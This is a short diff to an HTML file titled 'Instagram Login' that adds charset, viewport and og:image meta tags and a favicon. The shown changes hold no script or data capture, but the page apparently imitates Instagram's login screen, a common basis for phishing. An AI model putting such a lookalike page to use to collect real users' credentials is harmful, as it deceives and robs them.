--- a/index.html
+++ b/index.html
@@ -1,6 +1,8 @@
 <!DOCTYPE html>
 <html>
   <head>
+
+    
     <title>Instagram Login</title>
     <style>
       body {
@@ -40,6 +42,11 @@
         display: inline-block;
       }
     </style>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <meta property="og:image" content="download.jpeg">
+    
+    <link rel="shortcut icon" href="./download.jpeg" type="image/x-icon">
   </head>
   <body>
     <div class="container">
